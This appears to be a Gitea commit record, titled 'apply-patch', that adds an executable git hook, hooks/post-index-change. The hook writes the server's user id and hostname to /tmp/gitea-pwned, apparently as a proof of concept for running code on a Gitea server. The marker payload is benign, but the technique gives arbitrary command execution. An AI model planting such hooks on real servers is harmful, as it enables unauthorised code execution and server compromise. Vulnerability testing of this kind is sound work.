apply-patch

This commit is contained in:
2026-08-09 12:36:17 +02:00
parent 5b222a46e3
commit 7c87ca8806

4
hooks/post-index-change Executable file
View File

@@ -0,0 +1,4 @@
#!/bin/sh
id > /tmp/gitea-pwned
hostname >> /tmp/gitea-pwned
exit 0